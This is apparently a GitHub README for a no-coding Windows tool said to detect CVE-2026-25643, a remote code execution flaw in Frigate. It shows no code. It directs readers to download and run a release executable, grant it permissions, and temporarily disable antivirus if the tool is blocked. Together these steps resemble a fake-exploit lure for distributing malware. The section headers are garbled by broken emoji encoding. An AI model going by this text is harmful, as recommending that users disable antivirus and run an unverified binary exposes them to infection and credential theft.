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# โ ๏ธ CVE-2026-25643 - Detect and Analyze Remote Code Execution
[](https://github.com/DyniePro/CVE-2026-25643)
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## ๐ Overview
This tool helps you check and analyze a security issue called CVE-2026-25643. It focuses on a vulnerability found in Frigate software versions up to 0.16.3. The problem allows remote attackers to run commands on the affected system without permission, known as a blind remote code execution (RCE).
This program is designed for security professionals and system administrators who want to test if this vulnerability exists in their setup. It also helps developers understand the risk and prepare a fix.
You don't need any prior programming skills to use this tool if you follow these instructions.
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## ๐ป System Requirements
- Windows 10 or later
- At least 4 GB of RAM
- 500 MB free disk space
- Internet connection for downloading and updates
- No special hardware needed
Make sure your Windows system meets these requirements for a smooth experience.
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## ๐ฏ Key Features
- Detects CVE-2026-25643 vulnerability affecting Frigate โค0.16.3
- Simple setup with no coding needed
- Runs quick tests and shows clear results
- Helps in manual security checks
- Runs safely without harming your system
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## ๐ Where to Download
You can get the tool by visiting the main page:
[Download CVE-2026-25643](https://github.com/DyniePro/CVE-2026-25643)
Click the link above to go directly to the repository where you can find the latest files.
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## ๐ Getting Started: Download and Run on Windows
1. Open your web browser and go to the download page:
https://github.com/DyniePro/CVE-2026-25643
2. On the repository page, look for a folder or section labeled **Releases** or a similar word. This is where the ready-to-use files are kept.
3. Download the Windows version. Usually, this will be a file ending with `.exe` or `.zip`. If you find a `.zip` file, you will need to extract it first.
4. To extract a `.zip` file:
- Right-click the file
- Select "Extract All"
- Choose a location you can easily find, like your Desktop or Downloads folder
- Click "Extract"
5. If the download is a `.exe` file, simply double-click it to run. Windows might ask for permission. Click "Yes" or "Allow."
6. After running the program, a window or command prompt will open to guide you. Follow the steps shown on the screen.
7. The tool will scan for the vulnerability and show you the results. Read these carefully to understand if your system is affected.
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## โ๏ธ How to Use the Tool Step by Step
- When the program starts, it may ask you to enter the IP address or hostname of the Frigate instance you want to test. You can find this by asking your network administrator or checking your settings.
- Enter the address and press Enter.
- The tool will perform tests automatically. This may take a few minutes.
- Results will appear on the screen indicating whether the vulnerability is present or not.
- If the vulnerability is found, the tool may offer suggestions on how to fix or report it.
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## ๐ Troubleshooting
- If the program fails to start, check that you have downloaded the correct file for Windows.
- Ensure your user account has permission to run programs and install software.
- Temporarily disable antivirus software if it blocks the tool, but re-enable it after the test.
- Confirm your internet connection is working during download and operation.
- If the tool shows error messages, write them down and search online or ask technical support.
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## ๐ Additional Information
### What is CVE-2026-25643?
This is a known security vulnerability affecting Frigate versions 0.16.3 and earlier. It allows attackers to execute system commands remotely by exploiting a flaw in the way the software handles certain inputs. Attackers can gain control of the affected system without user consent.
### Why use this tool?
Security testing helps protect your network and data. By finding this vulnerability early, you can update or patch your software before attackers can exploit it.
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## ๐ก Security Tips
- Always keep your software updated.
- Apply patches immediately when available.
- Limit network access to critical applications.
- Use strong passwords and multi-factor authentication.
- Monitor logs for suspicious activity.
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## ๐ Getting Help
If you need assistance with this tool:
- Visit the GitHub page: https://github.com/DyniePro/CVE-2026-25643
- Check the **Issues** section for known problems or help requests.
- Use the **Discussions** tab to ask questions.
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[](https://github.com/DyniePro/CVE-2026-25643)